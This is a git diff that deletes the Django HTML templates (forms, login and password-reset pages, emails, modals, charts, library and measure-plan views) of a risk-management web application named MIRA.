    - {% endfor %} - {% if field.field.widget|class == "ReadOnlyPasswordHashWidget" %} - {% if field.value == '' %} - {{ field }} - {% else %} - {% endif %} - {% else %} - {{ field }} - {% endif %} -
    - {{ field.help_text|safe }} -
    -
    -
    - {% endif %} - {% endfor %} -
    -
    - - - -
    -
    -
    -
    -{% endblock content %} \ No newline at end of file diff --git a/core/templates/forms/widgets/searchable_select.html b/core/templates/forms/widgets/searchable_select.html deleted file mode 100644 index 10fc3e1..0000000 --- a/core/templates/forms/widgets/searchable_select.html +++ /dev/null @@ -1,100 +0,0 @@ -{% load forms_extras %} - -{% if widget.attrs.disabled %} - - - - - -{% else %} - - -
    -
    - -
    -
    -

    -
    -
    - - - -
    -
    - - -{% endif %} \ No newline at end of file diff --git a/core/templates/forms/widgets/select_multiple.html b/core/templates/forms/widgets/select_multiple.html deleted file mode 100644 index 9454114..0000000 --- a/core/templates/forms/widgets/select_multiple.html +++ /dev/null @@ -1,39 +0,0 @@ -
    - -
    -
    - -
    - -
    - -
    - - {% comment %}
    -

    Search Input:

    -
    {% endcomment %} - - {% with id=widget.attrs.id %} - - {% for group, options, index in widget.optgroups %} - {% if group %} -
    - - {% endif %} - {% for option in options %} -
    - {% include option.template_name with widget=option %} -
    - {% endfor %} - {% if group %}
    {% endif %} - {% endfor %} -
    {% endwith %} - -
    - -
    diff --git a/core/templates/forms/widgets/select_option.html b/core/templates/forms/widgets/select_option.html deleted file mode 100644 index 5318de1..0000000 --- a/core/templates/forms/widgets/select_option.html +++ /dev/null @@ -1,7 +0,0 @@ -
    - {{ widget.label }} -
    \ No newline at end of file diff --git a/core/templates/generic/detail.html b/core/templates/generic/detail.html deleted file mode 100644 index 384868d..0000000 --- a/core/templates/generic/detail.html +++ /dev/null @@ -1,42 +0,0 @@ -{% extends 'core/base.html' %} - -{% load i18n static %} - -{% block content %} - -
    - {% with page_title=object %} - {% include 'snippets/breadcrumbs.html' %} - {% endwith %} - {% block above %}{% endblock above %} -
    -
    - {% for key, values in data.items %} -
    -
    - {{ key|capfirst }} -
    -
      - {% for value in values %} -
    • - {% if value %} {{ value|linebreaksbr }} {% else %} -- {% endif %} -
    • - {% empty %} -
    • --
    • - {% endfor %} -
    -
    - {% endfor %} -
    - {% block edit_button %} - {% if change %} - - {% trans "Edit" %} - - {% endif %} - {% endblock edit_button %} -
    - {% block below %}{% endblock below %} -
    - -{% endblock content %} \ No newline at end of file diff --git a/core/templates/library/library_detail.html b/core/templates/library/library_detail.html deleted file mode 100644 index 91bf9d4..0000000 --- a/core/templates/library/library_detail.html +++ /dev/null @@ -1,78 +0,0 @@ -{% extends 'core/base.html' %} - -{% load i18n static %} - -{% block content %} - -
    - {% with page_title=library.name %} - {% include 'snippets/breadcrumbs.html' %} - {% endwith %} -
    -
    -
    -

    - {{ library.description|linebreaksbr }} -

    - {% if can_import %} - - - {% include "snippets/modal/modal.html" with modal_action="import_library" header=_("Import library") library=library.name %} - - {% endif %} -
    -
    -

    {{ library.copyright |linebreaksbr }}

    -
    -
    - {% for type in types %} -
    -

    {% trans "Objects of type:" %} {{ type|upper }}

    - {% if type == "matrix" %} - {% for matrix in matrices %} -

    {% trans "Name" %}: {{ matrix.name }}

    -

    {% trans "Description" %}: {{ matrix.description }}

    - {% include 'snippets/risk_matrix.html'%} - {% endfor %} - {% endif %} - - {% if type == "threat" %} - - - - - - {% for object in library.objects %} - {% if object.type == type %} - - - - - - {% endif %} - {% endfor %} - {% elif type == "security_function" %} - - - - - - {% for object in library.objects %} - {% if object.type == type %} - - - - - - {% endif %} - {% endfor %} - {% endif %} -
    {% trans "Threat name" %}{% trans "Description" %}{% trans "Provider" %}
    {{ object.fields.name }}{{ object.fields.description|linebreaksbr }}{{ object.fields.provider }}
    {% trans "Security function name" %}{% trans "Description" %}{% trans "Provider" %}
    {{ object.fields.name }}{{ object.fields.description|linebreaksbr }}{{ object.fields.provider }}
    -
    - {% endfor %} -
    -
    -
    -
    - -{% endblock %} \ No newline at end of file diff --git a/core/templates/library/library_list.html b/core/templates/library/library_list.html deleted file mode 100644 index 0f1a46a..0000000 --- a/core/templates/library/library_list.html +++ /dev/null @@ -1,123 +0,0 @@ -{% extends 'core/base.html' %} - -{% load i18n static core_extras %} - -{% block content %} - -
    - {% with page_title=_('Libraries') %} - {% include 'snippets/breadcrumbs.html' %} - {% endwith %} - -
    -
    -

    {% trans "Default libraries" %}

    -
    - - - - - - - - - - {% for library in libraries %} - - - - - - - - {% empty %} - - - - {% endfor %} - -
    {% trans "Library name" %}{% trans "Language" %}{% trans "Description" %}{% trans "Overview" %}{% trans "Actions" %}
    -

    - {{ library.name }} -

    -
    -

    - {{ library.locale|country_flag }} {{ library.locale|language_name }} ({{ library.locale }}) -

    -
    -

    - {{ library.description|linebreaksbr }} -

    -
    -
      - {% if library.threats > 0 %} -
    • - {% blocktrans count counter=library.threats %} - {{ counter }} threat - {% plural %} - {{ counter }} threats - {% endblocktrans %} -
    • - {% endif %} - {% if library.matrices > 0 %} -
    • - {% blocktrans count counter=library.matrices %} - {{ counter }} matrix - {% plural %} - {{ counter }} matrices - {% endblocktrans %} -
    • - {% endif %} - {% if library.security_functions > 0 %} -
    • - {% blocktrans count counter=library.security_functions %} - {{ counter }} security function - {% plural %} - {{ counter }} security functions - {% endblocktrans %} -
    • - {% endif %} -
    -
    -
    - - - - {% if library.security_functions > 0 and securityfunction_import or library.matrices > 0 and matrix_import or library.threats > 0 and threat_import %} - - - {% include "snippets/modal/modal.html" with modal_action="import_library" header=_("Import library") library=library.name %} - - {% endif %} -
    -
    - -

    {% trans "No library found." %}

    -
    -
    - {% comment %} {% include 'snippets/paginator.html' %} {% endcomment %} -
    - -
    -

    {% trans "Upload your own library" %}

    - -
    -
    - {% csrf_token %} -

    {{ form.non_field_errors|striptags }}

    - -
    - - -
    -
    -
    -
    -
    -
    -{% endblock %} \ No newline at end of file diff --git a/core/templates/library/library_upload.html b/core/templates/library/library_upload.html deleted file mode 100644 index aa10dcd..0000000 --- a/core/templates/library/library_upload.html +++ /dev/null @@ -1,20 +0,0 @@ -{% extends 'core/base.html' %} - -{% load i18n static %} - -{% block content %} - -
    - {% with page_title=_('Upload a library') %} - {% include 'snippets/breadcrumbs.html' %} - {% endwith %} -
    -
    - {% csrf_token %} - {{ form.as_p }} - -
    -
    -
    - -{% endblock %} \ No newline at end of file diff --git a/core/templates/license/overview.html b/core/templates/license/overview.html deleted file mode 100644 index ae345fc..0000000 --- a/core/templates/license/overview.html +++ /dev/null @@ -1,74 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n static %} - -{% block content %} - -{% with page_title=_('License management') %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} - -
    -
    -
    - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    - {% trans "Deployment mode" %} - - {{ licence_deployment }} -
    - {% trans "License type" %} - - {{ licence_type }} -
    - {% trans "Used seats" %} - - {{ users_number }} {% trans "out of" %} {{ users_number_limit }} -
    - {% trans "Seats limit" %} - - {% trans "Disabled" %} -
    - {% trans "Support" %} - - {{ licence_support }} -
    - {% trans "Expiration date" %} - - {{ licence_expiration }} -
    -
    -
    - -{% endblock %} \ No newline at end of file diff --git a/core/templates/registration/cgu.html b/core/templates/registration/cgu.html deleted file mode 100644 index ddf4bab..0000000 --- a/core/templates/registration/cgu.html +++ /dev/null @@ -1,27 +0,0 @@ -{% load i18n %} -{% load static %} -{% load tailwind_tags %} -{% tailwind_css %} - - - - - - - -

    1. Introduction

    -

    Merci de visiter notre site web de vente en ligne (ci-après, le "Site"). En accédant ou en utilisant le Site, vous acceptez de vous conformer aux présentes Conditions générales d'utilisation ("CGU"). Si vous n'êtes pas d'accord avec ces CGU, veuillez ne pas utiliser le Site.

    -

    2. Utilisation du Site

    -

    Vous êtes responsable de l'utilisation du Site et de tout contenu que vous publiez. Vous acceptez de ne pas utiliser le Site à des fins illégales ou de manière qui viole les droits d'autrui.

    -

    3. Contenu du Site

    -

    Nous nous efforçons de maintenir le contenu du Site à jour et précis, mais nous ne pouvons pas garantir son exhaustivité ou son exactitude. Le contenu du Site est fourni à titre informatif uniquement et ne doit pas être considéré comme des conseils professionnels ou médicaux. Vous êtes seul responsable de l'utilisation de ces informations et de la prise de décisions en conséquence.

    -

    4. Compte utilisateur

    -

    Pour utiliser certaines fonctionnalités du Site, vous devez créer un compte utilisateur. Vous acceptez de fournir des informations exactes et à jour lors de la création de votre compte, et de mettre à jour ces informations en cas de modification. Vous êtes responsable de la sécurité de votre compte utilisateur et de toute activité qui se produit sur votre compte.

    -

    4. Compte utilisateur

    -

    Pour utiliser certaines fonctionnalités du Site, vous devez créer un compte utilisateur. Vous acceptez de fournir des informations exactes et à jour lors de la création de votre compte, et de mettre à jour ces informations en cas de modification. Vous êtes responsable de la sécurité de votre compte utilisateur et de toute activité qui se produit sur votre compte.

    -

    4. Compte utilisateur

    -

    Pour utiliser certaines fonctionnalités du Site, vous devez créer un compte utilisateur. Vous acceptez de fournir des informations exactes et à jour lors de la création de votre compte, et de mettre à jour ces informations en cas de modification. Vous êtes responsable de la sécurité de votre compte utilisateur et de toute activité qui se produit sur votre compte.

    -

    4. Compte utilisateur

    -

    Pour utiliser certaines fonctionnalités du Site, vous devez créer un compte utilisateur. Vous acceptez de fournir des informations exactes et à jour lors de la création de votre compte, et de mettre à jour ces informations en cas de modification. Vous êtes responsable de la sécurité de votre compte utilisateur et de toute activité qui se produit sur votre compte.

    - - diff --git a/core/templates/registration/first_connexion_confirm.html b/core/templates/registration/first_connexion_confirm.html deleted file mode 100644 index 9488abb..0000000 --- a/core/templates/registration/first_connexion_confirm.html +++ /dev/null @@ -1,87 +0,0 @@ - - - - {% load i18n %} - {% load static %} - {% load tailwind_tags %} - {% block title %}MIRA{% endblock title %} - - - - - {% tailwind_css %} - - -{% block content %} - - - - - - - - - -
    -
    -
    -
    -
    {% trans "Hello there" %} 👋
    -
    -

    {% trans "This is MIRA. Your streamlined" %} {% trans "one-stop shop" %} - {% trans "for risk assessment and management." %} -

    -

    {% trans "In order to log in, you must create a password for your account." %} -

    -
    -
    -
    -
    {% csrf_token %} -
    -

    {{ form.non_field_errors|striptags }}

    - {% for field in form %} - {% if field.name == "terms_service" %} -
    - {{field}} - {% trans "I agree and acccept" %} - {% trans "Terms and conditions of use" %} -
    - {% for error in field.errors %} -

    {{ error|striptags }}

    - {% endfor %} -
    - {{ field.help_text|safe }} -
    -
    -
    - {% else %} -
    - -
    - {% for error in field.errors %} -

    {{ error|striptags }}

    - {% endfor %} - {{ field }} -
    - {{ field.help_text|safe }} -
    -
    -
    - {% endif %} - {% endfor %} -
    -
    - -
    -
    -
    -
    -
    -
    -
    - - -{% endblock %} \ No newline at end of file diff --git a/core/templates/registration/first_connexion_email.html b/core/templates/registration/first_connexion_email.html deleted file mode 100644 index c471192..0000000 --- a/core/templates/registration/first_connexion_email.html +++ /dev/null @@ -1,71 +0,0 @@ -{% load i18n static%} - - - - - - - - -
    -
    - -
    -

    {% trans "Welcome to Mira!" %}

    -

    {% trans "Your all-in-one Risk Management Platform" %}

    -
    - - -Mira logo - -
    - -{% autoescape off %} - - - -

    - - - -

    - -{% trans "You have been granted access to Mira. To get started, use the link below to define your password:" %} - -

    - -

    - {% trans "Set my password" %} -

    - -

    {% trans "An issue with the link? copy and paste the following in your browser" %}:

    - -

    - {{ root_url }}{% url 'first_connexion_confirm' uidb64=uid token=token %} -

    - -

    - -{% trans "This link can only be used once. In case of an issue, you can access your instance" %} {% trans "here" %} {% trans "and request a password reset"%}. - -

    - -

    -{% trans "If you, or your organization, did not make this request, you can simply ignore this email"%}. -

    - -

    - {% trans "Learn more about Mira" %} {% trans "here" %}. -

    - - - -{% trans "Sincerely"%},
    -{% trans "Mira Team"%} - -
    - - -{% endautoescape %} - - \ No newline at end of file diff --git a/core/templates/registration/login.html b/core/templates/registration/login.html deleted file mode 100644 index d7ad0cd..0000000 --- a/core/templates/registration/login.html +++ /dev/null @@ -1,79 +0,0 @@ - - - - {% load i18n %} - {% load static %} - {% load tailwind_tags %} - {% block title %}MIRA{% endblock title %} - - - - - {% tailwind_css %} - - - - - {% block content %} -
    -
    -
    -
    {% trans "Hello there" %} 👋
    -
    -

    {% trans "This is MIRA. Your streamlined" %} {% trans "one-stop shop" %} - {% trans "for risk assessment and management." %} -

    -

    {% trans "You need to" %} {% trans "login" %} {% trans "to access all the features." %}

    -
    -
    -
    - {% if invalid %} -
    {% trans "Invalid Username or password" %}
    - {% endif %} -
    -
    - {% csrf_token %} -

    {{ form.non_field_errors|striptags }}

    - {% for field in form %} -
    - -
    - {% for error in field.errors %} -

    {{ error|striptags }}

    - {% endfor %} - {{ field }} -
    - {{ field.help_text|safe }} -
    -
    -
    - {% endfor %} - - - - {%include 'passkeys.js' %} -
    - -
    - - -
    - -
    - -
    - - -
    - {% endblock content %} - - \ No newline at end of file diff --git a/core/templates/registration/password_reset.html b/core/templates/registration/password_reset.html deleted file mode 100644 index f7c1b06..0000000 --- a/core/templates/registration/password_reset.html +++ /dev/null @@ -1,43 +0,0 @@ - - - - {% load i18n %} - {% load static %} - {% load tailwind_tags %} - {% block title %}MIRA{% endblock title %} - - - - - {% tailwind_css %} - - - -
    - {% include 'snippets/messages.html' %} -
    -
    -
    {% trans "Password reset" %} 🔒
    -
    -

    {% trans "Forgotten your password? Enter your email address below, and we'll email instructions for setting a new one." %}

    -
    -
    -
    -
    -
    - {% csrf_token %} -
    -

    {% trans "Email:" %}

    - {% for field in password_reset_form %} - {{ field }} - {% endfor %} -
    - -
    -
    -
    -
    -
    \ No newline at end of file diff --git a/core/templates/registration/password_reset_complete.html b/core/templates/registration/password_reset_complete.html deleted file mode 100644 index bc2fecc..0000000 --- a/core/templates/registration/password_reset_complete.html +++ /dev/null @@ -1,25 +0,0 @@ - - - - {% load i18n %} - {% load static %} - {% load tailwind_tags %} - {% block title %}MIRA{% endblock title %} - - - - - {% tailwind_css %} - - - -
    -
    -
    -
    {% trans "Password reset complete" %} ✅
    -
    -

    {% trans "Your password has been set. You may go ahead and" %} {% trans "log in" %} {% trans "now." %}

    -
    -
    -
    -
    \ No newline at end of file diff --git a/core/templates/registration/password_reset_confirm.html b/core/templates/registration/password_reset_confirm.html deleted file mode 100644 index 6db5d80..0000000 --- a/core/templates/registration/password_reset_confirm.html +++ /dev/null @@ -1,47 +0,0 @@ - - - - {% load i18n %} - {% load static %} - {% load tailwind_tags %} - {% block title %}MIRA{% endblock title %} - - - - - {% tailwind_css %} - - -{% block content %} - -
    -
    -
    -
    {% csrf_token %} -
    -

    {{ form.non_field_errors|striptags }}

    - {% for field in form %} -
    - -
    - {% for error in field.errors %} -

    {{ error|striptags }}

    - {% endfor %} - {{ field }} -
    - {{ field.help_text|safe }} -
    -
    -
    - {% endfor %} -
    -
    - -
    -
    -
    -
    -
    - -{% endblock %} \ No newline at end of file diff --git a/core/templates/registration/password_reset_done.html b/core/templates/registration/password_reset_done.html deleted file mode 100644 index ad3f80b..0000000 --- a/core/templates/registration/password_reset_done.html +++ /dev/null @@ -1,25 +0,0 @@ - - - - {% load i18n %} - {% load static %} - {% load tailwind_tags %} - {% block title %}MIRA{% endblock title %} - - - - - {% tailwind_css %} - - - -
    -
    -
    -
    {% trans "Password reset sent" %} 📨
    -
    -

    {% trans "We've emailed you instructions for setting your password, if an account exists with the email you entered. You should receive them shortly." %}
    {% trans "If you don't receive an email, please make sure you've entered the address you registered with, and check your spam folder." %}

    -
    -
    -
    -
    \ No newline at end of file diff --git a/core/templates/registration/password_reset_email.html b/core/templates/registration/password_reset_email.html deleted file mode 100644 index 36154dc..0000000 --- a/core/templates/registration/password_reset_email.html +++ /dev/null @@ -1,68 +0,0 @@ -{% load i18n static%} - - - - - - - - - - - - - - - - -
    -
    - -
    -

    Mira

    -

    {% trans "Your all-in-one Risk Management Platform" %}

    -
    - - Mira logo - -

    - - {% autoescape off %} -

    - {% trans "Hello" %}, -

    - -

    - {% trans "We have received a password reset request for this email. Click below to proceed:" %} -

    - -

    - {% trans "Reset my password" %} -

    - -

    {% trans "An issue with the link? copy and paste the following in your browser" %}:

    - -

    - {{ root_url }}{% url 'password_reset_confirm' uidb64=uid token=token %} -

    - -

    - {% trans "This link can only be used once. In case of an issue, go to your instance" %} {% trans "here" %} {% trans "and request a new password reset" %}. -

    - -

    - {% trans "If you, or your organization, did not make this request, you can simply ignore this email" %}. -

    - - {% trans "Sincerely" %},
    - {% trans "Mira Team" %} - - {% endautoescape %} -
    - - - - - \ No newline at end of file diff --git a/core/templates/snippets/action_button_modal.html b/core/templates/snippets/action_button_modal.html deleted file mode 100644 index f962816..0000000 --- a/core/templates/snippets/action_button_modal.html +++ /dev/null @@ -1,16 +0,0 @@ -{% load i18n static %} - - \ No newline at end of file diff --git a/core/templates/snippets/add_button_modal.html b/core/templates/snippets/add_button_modal.html deleted file mode 100644 index 45c6c1f..0000000 --- a/core/templates/snippets/add_button_modal.html +++ /dev/null @@ -1,11 +0,0 @@ -{% load i18n static %} - -
    - - - {{ content }} - - {% include "snippets/modal/modal.html" with modal_action="create" %} -
    \ No newline at end of file diff --git a/core/templates/snippets/associated_users_list_nested.html b/core/templates/snippets/associated_users_list_nested.html deleted file mode 100644 index d918f99..0000000 --- a/core/templates/snippets/associated_users_list_nested.html +++ /dev/null @@ -1,54 +0,0 @@ -{% load i18n %} -{% load static tailwind_tags %} - - - - - - - - - {% for user in associated_users|dictsort:"last_name" %} - - - - - - {% empty %} - - - - {% endfor %} - -
    - {% trans "Username" %} - - {% trans "Full Name" %} - - {% trans "Email" %} -
    -
    - {% if not user.is_active %} - {% trans "inactive" %} - {% endif %} - {% if user.is_superuser %} - {% trans "superuser" %} - {% endif %} -
    -

    - {{ user.get_username }} -

    -
    -
    -
    -

    - {{ user.get_full_name}} -

    -
    -

    - {{ user.email }} -

    -
    - -

    {% trans "No user found." %}

    -
    \ No newline at end of file diff --git a/core/templates/snippets/bar_chart.html b/core/templates/snippets/bar_chart.html deleted file mode 100644 index c25cc45..0000000 --- a/core/templates/snippets/bar_chart.html +++ /dev/null @@ -1,49 +0,0 @@ -
    - \ No newline at end of file diff --git a/core/templates/snippets/breadcrumbs.html b/core/templates/snippets/breadcrumbs.html deleted file mode 100644 index 8254bc8..0000000 --- a/core/templates/snippets/breadcrumbs.html +++ /dev/null @@ -1,17 +0,0 @@ -{% load i18n %} -{% load static tailwind_tags %} -
    -

    {{ page_title }}

    - -
    - - - - {% trans "Home" %} - - {% for url, name in crumbs.items %}{{ name }} - - {% endfor %} -

    {{ page_title }}

    -
    -
    \ No newline at end of file diff --git a/core/templates/snippets/color_class.html b/core/templates/snippets/color_class.html deleted file mode 100644 index 39b754d..0000000 --- a/core/templates/snippets/color_class.html +++ /dev/null @@ -1,11 +0,0 @@ -{% if level == 'VL' %} -light green -{% elif level == 'L' %} -green -{% elif level == 'M' %} -yellow -{% elif level == 'H' %} -orange -{% else %} -red -{% endif %} \ No newline at end of file diff --git a/core/templates/snippets/create_modal.html b/core/templates/snippets/create_modal.html deleted file mode 100644 index d158153..0000000 --- a/core/templates/snippets/create_modal.html +++ /dev/null @@ -1,118 +0,0 @@ -{% load i18n static %} - -
    - -
    - - - - - -
    -
    -
    -
    \ No newline at end of file diff --git a/core/templates/snippets/delete_button_modal.html b/core/templates/snippets/delete_button_modal.html deleted file mode 100644 index af0da4a..0000000 --- a/core/templates/snippets/delete_button_modal.html +++ /dev/null @@ -1,11 +0,0 @@ - - - - - - - {% include 'snippets/modal/modal.html' with modal_action="delete" %} - - \ No newline at end of file diff --git a/core/templates/snippets/donut_chart.html b/core/templates/snippets/donut_chart.html deleted file mode 100644 index ae1ad47..0000000 --- a/core/templates/snippets/donut_chart.html +++ /dev/null @@ -1,64 +0,0 @@ -
    - \ No newline at end of file diff --git a/core/templates/snippets/dual_bar_stacked.html b/core/templates/snippets/dual_bar_stacked.html deleted file mode 100644 index 8a1fc3d..0000000 --- a/core/templates/snippets/dual_bar_stacked.html +++ /dev/null @@ -1,178 +0,0 @@ -{% load i18n %} -
    - \ No newline at end of file diff --git a/core/templates/snippets/form_checkbox_select_multiple.html b/core/templates/snippets/form_checkbox_select_multiple.html deleted file mode 100644 index 8b0ce0f..0000000 --- a/core/templates/snippets/form_checkbox_select_multiple.html +++ /dev/null @@ -1,19 +0,0 @@ -
    -
    - -
    -
    -
    - {{ field }} - - {% for error in field.errors %} -
  • {{ error|striptags }}
  • - {% endfor %} -
    -
    -
    -
    -
    - {{ field.help_text|safe }} -
    -
    \ No newline at end of file diff --git a/core/templates/snippets/form_field_row.html b/core/templates/snippets/form_field_row.html deleted file mode 100644 index 219e070..0000000 --- a/core/templates/snippets/form_field_row.html +++ /dev/null @@ -1,19 +0,0 @@ -
    -
    - -
    -
    -
    - {{ field }} - - {% for error in field.errors %} -
  • {{ error|striptags }}
  • - {% endfor %} -
    -
    -
    -
    -
    - {{ field.help_text|safe }} -
    -
    \ No newline at end of file diff --git a/core/templates/snippets/link_modal.html b/core/templates/snippets/link_modal.html deleted file mode 100644 index 62d954d..0000000 --- a/core/templates/snippets/link_modal.html +++ /dev/null @@ -1,21 +0,0 @@ -{% load i18n static %} - -{% if topic == 'no_matrix' %} -
    - - - {{ content }} - - {% include "snippets/modal/modal.html" with modal_action="text" %} -
    -{% else %} -
    - {{ content }} - - {% include "snippets/modal/modal.html" with modal_action="text" %} -
    -{% endif %} \ No newline at end of file diff --git a/core/templates/snippets/messages.html b/core/templates/snippets/messages.html deleted file mode 100644 index 4cea353..0000000 --- a/core/templates/snippets/messages.html +++ /dev/null @@ -1,81 +0,0 @@ -{% if messages %} -
      -
      - {% for message in messages %} - {% if message.tags == "success" %} - - {% elif message.tags == "error" %} - - {% elif message.tags == "info" %} - - {% elif message.tags == "warning" %} - - {% endif %} - {% endfor %} -
      -
    -{% endif %} - \ No newline at end of file diff --git a/core/templates/snippets/mitigations_quadrants.html b/core/templates/snippets/mitigations_quadrants.html deleted file mode 100644 index fa98830..0000000 --- a/core/templates/snippets/mitigations_quadrants.html +++ /dev/null @@ -1,65 +0,0 @@ -
    - \ No newline at end of file diff --git a/core/templates/snippets/modal/modal.html b/core/templates/snippets/modal/modal.html deleted file mode 100644 index a3da86a..0000000 --- a/core/templates/snippets/modal/modal.html +++ /dev/null @@ -1,78 +0,0 @@ -{% load i18n static core_extras %} - -
    - - - - -
    - - - - - -
    -
    -
    -
    \ No newline at end of file diff --git a/core/templates/snippets/modal/modal_about_mira.html b/core/templates/snippets/modal/modal_about_mira.html deleted file mode 100644 index 28a602c..0000000 --- a/core/templates/snippets/modal/modal_about_mira.html +++ /dev/null @@ -1,65 +0,0 @@ -{% load i18n static core_extras %} - -
    - -
    - - - - - -
    -
    -
    -
    \ No newline at end of file diff --git a/core/templates/snippets/modal/modal_action_form.html b/core/templates/snippets/modal/modal_action_form.html deleted file mode 100644 index 8a27138..0000000 --- a/core/templates/snippets/modal/modal_action_form.html +++ /dev/null @@ -1,22 +0,0 @@ -{% load i18n static %} -
    -

    {% trans "This action cannot be undone. This will permanently affect the following object: " %}{{ object }}

    - {% comment %} {% for item in object.item_set.all %} - {{ item }} - {% endfor %} {% endcomment %} -
    - {{ extra_text }} -
    -
    - -
    {% csrf_token %} - -
    -
    -
    \ No newline at end of file diff --git a/core/templates/snippets/modal/modal_create_form.html b/core/templates/snippets/modal/modal_create_form.html deleted file mode 100644 index 2c22013..0000000 --- a/core/templates/snippets/modal/modal_create_form.html +++ /dev/null @@ -1,43 +0,0 @@ -{% load static i18n core_extras %} - - -
    {% csrf_token %} - -

    {{ form.non_field_errors|striptags }}

    - {{ form.errors }} -
    - {% for field in form %} - {% if field.field.widget|class == "CheckboxInput" %} - {% include 'snippets/form_field_row.html' %} - {% else %} -
    - -
    - {% for error in field.errors %} -

    {{ error|striptags }}

    - {% endfor %} - {{ field }} - {% if field.field.widget.attrs.disabled %} - - {% endif %} -

    {{ field.help_text }}

    -
    -
    - {% endif %} - {% endfor %} - -
    -
    - - - -
    -
    -
    -
    - \ No newline at end of file diff --git a/core/templates/snippets/modal/modal_delete_form.html b/core/templates/snippets/modal/modal_delete_form.html deleted file mode 100644 index e027ce1..0000000 --- a/core/templates/snippets/modal/modal_delete_form.html +++ /dev/null @@ -1,23 +0,0 @@ -{% load i18n static %} -
    -

    {% trans "This action cannot be undone. This will permanently delete the following object: " %}{{ object }} - {% trans "as well as any child object." %}

    - {% comment %} {% for item in object.item_set.all %} - {{ item }} - {% endfor %} {% endcomment %} -
    - {{ extra_text }} -
    -
    - -
    {% csrf_token %} - -
    -
    -
    \ No newline at end of file diff --git a/core/templates/snippets/modal/modal_import_library_form.html b/core/templates/snippets/modal/modal_import_library_form.html deleted file mode 100644 index c244ea0..0000000 --- a/core/templates/snippets/modal/modal_import_library_form.html +++ /dev/null @@ -1,22 +0,0 @@ -{% load i18n static %} -
    -

    - {% blocktrans %} - Are you sure you want to import the following library: {{ library }}? - {% endblocktrans %} -

    -
    - {{ extra_text }} -
    -
    - -
    {% csrf_token %} - -
    -
    -
    \ No newline at end of file diff --git a/core/templates/snippets/modal/modal_text.html b/core/templates/snippets/modal/modal_text.html deleted file mode 100644 index 53d4bd1..0000000 --- a/core/templates/snippets/modal/modal_text.html +++ /dev/null @@ -1,39 +0,0 @@ -{% load static i18n core_extras %} - - -
    - {% if topic == "cgu" %} - {% include 'registration/cgu.html' %} - {% elif topic == "BI-RL-AUD" %} -
    -
    -
    -

    {% trans "This role gives read access to selected projects and domains." %}

    - {% elif topic == "BI-RL-VAL" %} -
    -
    -
    -

    {% trans "This role is like an auditor, and can also manage risk acceptances." %}

    - {% elif topic == "BI-RL-ANA" %} -
    -
    -
    -

    {% trans "This role gives read and write access to selected projects and domains. It has also read access on global and domain objects." %}

    - {% elif topic == "BI-RL-DMA" %} -
    -
    -
    -

    {% trans "This role gives full access to selected domains. Like an analyst, it has also read access on global and domain objects." %}

    - {% elif topic == "BI-RL-ADM" %} -
    -
    -
    -

    {% trans "This role has all permissions, specifically to manage project domains, users and users rights." %}

    - {% elif topic == 'no_matrix' %} -
    -
    -
    -

    {% trans "No matrix loaded or enabled. If you have not at least one enabled matrix in your database, you will not be able to create analyses." %}

    - {% endif %} -
    - \ No newline at end of file diff --git a/core/templates/snippets/modal/modal_update_form.html b/core/templates/snippets/modal/modal_update_form.html deleted file mode 100644 index c3a5f5e..0000000 --- a/core/templates/snippets/modal/modal_update_form.html +++ /dev/null @@ -1,42 +0,0 @@ -{% load static i18n core_extras %} - - -
    {% csrf_token %} -
    - -
    -
    - -
    -
    - - {{ form.security_measures }} - - {% for error in form.security_measures.errors %} -
  • {{ error|striptags }}
  • - {% endfor %} -
    -
    - {{ form.security_measures.help_text|safe }} -
    -
    -
    - -
    - -
    - - - -
    -
    -
    - - \ No newline at end of file diff --git a/core/templates/snippets/mp_data.html b/core/templates/snippets/mp_data.html deleted file mode 100644 index 06b5e1f..0000000 --- a/core/templates/snippets/mp_data.html +++ /dev/null @@ -1,99 +0,0 @@ -{% load i18n %} - -
    -
    -

    {% trans "Domain" %}: {{ analysis.project.folder }}

    -

    /

    -

    {% trans "Project" %}: {{ analysis.project }}

    -

    /

    -

    {% trans "Analysis" %}: {{ analysis.name }} - {{ analysis.version }}

    -
    -

    {% trans "Associated risk scenarios" %}:

    -
    - - - - - {% if not context %} - - - - {% endif %} - {% for scenario in context %} - - - - {% if not scenario.security_measures.all %} - - - - {% else %} - - - - - - - - - - - - - - - - - - - - - {% endif %} - {% for securitymeasure in scenario.security_measures.all %} - - - - - - - - - - - - {% endfor %} - {% endfor %} - -
    - {% trans "Risk analysis seems to be empty. Measure Plan cannot be generated." %} -
    - {{ scenario.rid }}: {{ scenario.name }} - {{ scenario.get_treatment_display|lower}} - -
    {% trans "No associated measure" %} -
    {% trans "Existing measures" %}:
    {{ scenario.existing_measures }}
    {% trans "Additional measures" %}:
    #{% trans "Name" %}{% trans "Description" %}{% trans "Type" %}{% trans "Security function" %}{% trans "ETA" %}{% trans "Effort" %}{% trans "Link" %}{% trans "Status" %}
    {{ securitymeasure.mid }}{{ securitymeasure.name }}{% if securitymeasure.description %}{{ securitymeasure.description|linebreaksbr }}{% endif %}{{ securitymeasure.get_type_display }}{% if securitymeasure.security_function %}{{ securitymeasure.security_function }}{% else %}--{% endif %}{% if securitymeasure.eta %}{{ securitymeasure.eta }}{% else %}--{%endif%}{% if securitymeasure.effort %}{{ securitymeasure.effort }}{% else %}--{%endif%}{% if securitymeasure.link %}{% else %}--{% endif %} - {{ securitymeasure.get_status_display|lower }} -
    -
    - -
    \ No newline at end of file diff --git a/core/templates/snippets/mtg_list_nested.html b/core/templates/snippets/mtg_list_nested.html deleted file mode 100644 index ca47a02..0000000 --- a/core/templates/snippets/mtg_list_nested.html +++ /dev/null @@ -1,57 +0,0 @@ -{% load i18n %} -{% load static tailwind_tags %} - - - - - - - - - - {% for security_measure in security_measures %} - - - - - - - {% empty %} - - - - {% endfor %} - -
    - {% trans "ID" %} - - {% trans "Measure" %} - - {% trans "Security function" %} - - {% trans "Status" %} -
    -

    - {{ security_measure.mid }} -

    -
    -
    - -
    -

    - {{ security_measure.name }} -

    -
    -
    -
    -

    - {% if security_measure.security_function %}{{ security_measure.security_function }}{% else %}--{% endif %} -

    -
    -

    - {{ security_measure.get_status_display }} -

    -
    - -

    {% trans "No measure found." %}

    -
